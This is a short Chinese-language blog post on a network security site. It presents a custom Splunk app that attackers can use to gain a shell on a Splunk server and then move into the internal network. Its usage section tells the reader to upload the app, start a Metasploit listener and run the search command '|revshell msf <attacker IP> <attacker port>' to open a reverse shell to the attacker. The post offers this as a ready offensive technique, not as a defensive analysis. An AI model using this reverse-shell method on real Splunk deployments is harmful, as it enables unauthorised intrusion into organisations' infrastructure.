通过splunk自定义app获取shell

日期: 栏目:网络安全 浏览:1696 评论:0

       Splunk是一个日志、流量聚合分析工具,通常用于防御分析和基础设施管理。正日Github作者说的,虽然这些工具可以很好地发现安全事件及风险,但它们也会反过来被攻击者利用,攻陷splunk并渗透内网中,成为管理员的噩梦。

通过splunk自定义app获取shell-第1张图片-Ceacer网络

使用方法:

上传APP后,本地使用MSF监听,并在splunk中执行以下语句即可获取shell

|revshell msf <attacker IP> <attacker port>



GitHub传送门


评论留言

我要留言

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。发布前请先查看评论规则:点我查看